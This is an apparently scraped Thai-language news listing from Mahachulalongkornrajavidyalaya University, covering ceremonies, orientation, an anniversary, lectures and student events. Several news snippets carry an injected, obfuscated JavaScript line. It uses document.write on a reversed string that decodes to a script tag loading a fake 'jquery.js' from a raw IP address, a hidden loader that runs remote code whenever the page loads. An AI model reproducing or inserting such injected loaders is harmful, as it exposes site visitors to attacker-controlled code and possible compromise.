นื่องในโอกาสวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี

เนื่องในโอกาสวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี ๓ มิถุนายน พ.ศ. ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัยได้จัดให้มีพิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติ และลงนามถวายพระพรชัยมงคล ในวันที่ ๓๑ พฤษภาคม พ.ศ. ๒๕๖๒ เวลา ๑๒.๓๐ น. โดยมีพระราชวรเมธี,รศ.ดร. รองอธิการบดีฝ่ายบริหาร เป็นประธานฝ่ายสงฆ์ และ รศ.ดร.สุรพล สุยะพรหม รองอธิการบดีฝ่ายกิจการทั่วไป เป็นประธานฝ่ายคฤหัสถ์ รวมทั้งผู้บริหาร คณาจารย์ เจ้าหน้าที่...

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย 

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย --------------------------------- ๒๖ มิถุนายน ๒๕๖๒ : พระธรรมปัญญาบดี นายกสภามหาวิทยาลัย เมตตาเป็นประธานในพิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย และกล่าวให้โอวาทแก่นิสิต ความว่า "คนไม่รู้หนังสือเหมือนกระบือตาบอด ไม่รู้ทิศเหนือทิศใต้ ไม่รู้หนองน้ำอยู่แห่งไหน ความพรากเพียร ขยันเรียนหนังสือ นั้นคือผู้ที่ประสบความสำเร็จในการศึกษาและการดำเนินชีวิต"ณ อาคาร มวก ๔๘ พรรษา มหาวชิราลงกรณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จ.พระนครศรีอยุธยา ...

โครงการสร้างเสริมอัตลักษณ์นิสิต มจร. สำหรับนิสิตชั้นปีที่ ๑ ประจำปีการศึกษา ๒๕๖

กองกิจการนิสิต มจร. จัดโครงการสร้างเสริมอัตลักษณ์นิสิต มจร. สำหรับนิสิตชั้นปีที่ ๑ ประจำปีการศึกษา ๒๕๖๒ เพื่อเตรียมความพร้อมให้นิสิตได้ทราบคุณลักษณะนิสิตที่พึงประสงค์ตามนวลักษณ์ ๙ ประการของมหาวิทยาลัย ได้ทราบกฎ ระเบียบ ข้อบังคับ กฎเกณฑ์ และแนวทางการจัดการเรียนการสอนของมหาวิทยาลัย และสามารถปรับตัวในระบบการศึกษา ตระหนักให้เกียรติภูมิและเกียรติศักดิ์ของความเป็นนิสิต มจร. ในปีการศึกษา ๒๕๖๒ นี้ มีนิสิตใหม่ ชั้นปีที่ ๑ เข้าโครงการฯ ทั้งสิ้น จำนวน...

ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน...

กำลังขนย้ายป้ายใหญ่ ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน - โคราช ที่กำลังจะสร้างเร็วๆนี้ กองสื่อสารองค์กร รายงาน ภาพ : ผศ.ดร.อิทธิพล แก้วพิลา ผู้ช่วยอธิการบดีฝ่ายประชาสัมพันธ์ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

ผู้บริหารคณาจารย์ เจ้าหน้าที่ นิสิต มจร “เจริญพระพุทธมนต์ส่งกำลังใจให้ทีมหมูป่า”

"ผู้บริหารคณาจารย์ เจ้าหน้าที่ นิสิต มจร"เจริญพระพุทธมนต์ส่งกำลังใจให้ทีมหมูป่า" Click now!! document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

เรื่องราวดีๆที่ควรบอกต่อ 24 ก.ค. 61 ณ ห้องประชุมสันติศึกษา ชั้น 4 อาคารดรียนรวม มจร วังน้อย

เรียนฟรี ฟังฟรี เรื่องราวดีๆที่ควรบอกต่อ Click now!! 24 ก.ค. 61 ณ ห้องประชุมสันติศึกษา ชั้น 4 อาคารดรียนรวม มจร วังน้อย   document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

โลโก้ มจร 130 ปี เนื่องในวาระวันครบรอบสถาปนา 130 ปี มหาจุฬาฯ มหาวิทยาลัย

"๑๓๐ ปี มหาจุฬา" เนื่องในวาระวันครบรอบสถาปนา 130 ปี มหาจุฬาฯ มหาวิทยาลัยได้มีการประชุมเตรียมงานในวันพุธที่ ๒๓ สิงหาคม พ.ศ. ๒๕๖๐ เวลา ๑๔.๐๐ น. พระพรหมบัณฑิต,ศ.ดร.อธิการบดี มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย เป็นประธานในการประชุมคณะกรรมการจัดงาน ครบรอบวันสถาปนา "๑๓๐"ปี มหาจุฬา" ณ ห้องประชุม ๔๐๑ อาคารสำนักงานอธิการบดี ซึ่งงานสำคัญในครั้งนี้ จะจัดขึ้นระหว่างวันที่ ๑๓-๑๗ กันยายน...

Social Faculty MCU filled a CHE QA Onlineคณะสังคมศาสตร์กรอกข้อมูล CHE QA Online

คณะสังคมศาสตร์ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ได้จัดโครงการกรอกข้อมูลลงในระบบฐานข้อมูล CHE QA Online ในวันนี้ (วันพุธที่ ๑๐ กุมภาพันธ์ ๒๕๕๙) เริ่มตั้งแต่เวลา ๐๘.๓๐ น. ผู้เข้าร่วมงานลงทะเบียนและพร้อมกัน ณ ห้องคอมพิวเตอร์ซี ๑๑๕ อาคารเรียนรวม มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย พระนครศรีอยุธยา เวลา ๐๙.๐๐ น. พระครูปริยัติกิตติธำรง, ผศ.ดร. คณบดีคณะสังคมศาสตร์...

ขอเชิญร่วมกิจกรรมชมรมภาษาอังกฤษนิสิตคณะมนุยศาสตร์ขอเชิญร่วมกิจกรรมชมรมภาษาอังกฤษนิสิตคณะมนุยศาสตร์

                     ขอเชิญเข้าร่วมกิจกรรมชมรมภาษาอังกฤษนิสิตคณะมนุษศาสตร์ มีกิจกรรมตอบปัญหา และโต้วาทีภาษาอังกฤษชิงรางวัลมากมายของนิสิตจากสถาบันอุดมศึกษา ๑๐ สถาบัน ในวันพฤหัสบดีที่ ๑๑ กุมภาพันธ์ พ.ศ.๒๕๕๙ ณ ห้องเธียเตอร์โซน A อาคารเรียนรวม มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา คลิกเพื่อดูกำหนดการได้ที่นี่  document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

พระพรหมบัณฑิต บรรยาย”การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน”พระพรหมบัณฑิต บรรยาย”การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน”

          พระพรหมบัณฑิต ศ.ดร. อธิการบดี มจรบรรยาย.."การปกป้องคุ้มครองพระพุทธศาสนาในสถานการณ์ปัจจุบัน" จัดโดยสาขาการจัดการเชิงพุทธ คณะสังคมศาสตร์ มจร ในวันอังคารที่ ๙ กุมภาพันธ์ พ.ศ.๒๕๕๙ เวลา ๐๙.๓๐- ๑๑.๐๐ น. ณ ห้องประชุมเธียเตอร์โซน D อาคารเรียนรวม มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ท่านกล่าวว่า....คนที่ฉลาดจะเรียนรู้ข้อผิดพลาดของตนเอง แต่คนฉลาดกว่าจะเรียนรู้ข้อผิดพลาดของคนอื่น เราเรียนระดับมหาบัณฑิตต้องพิจารณาให้ดี...

ขอเชิญชวนเข้าร่วมกิจกรรมอภิปรายวิชาการนิสิตคณะมนุยศาสตร์ ขอเชิญชวนเข้าร่วมกิจกรรมอภิปรายวิชาการนิสิตคณะมนุยศาสตร์

อภิปรายวิชาการนิสิตคณะมนุษยศาสตร์ เรื่อง บันเทิงภาษาเพื่อพัฒนาการเรียนรู้          ขอเชิญผู้สนใจเข้าร่วมกิจกรรมอภิปรายวิชาการนิสิตคณะมนุยศาสตร์ อภิปรายเรื่อง บันเทิงภาษาเพื่อพัฒนาการเรียนรู้ ในวันที่พุธที่ ๑๐ กุมภาพันธ์ พ.ศ.๒๕๕๙ เวลา ๑๓.๐๐ น.  และพบกับครูเพลง ตลกชื่อดัง ศิลปินอาวุโส MR.Darky ไพฑูรย์ ขันทอง เจ้าของผลงานเพลง "มีเมียเด็ก" และผลงานเพลงชื่อดังอีกมากมาย ณ ห้องเธียเตอร์โซน A...
X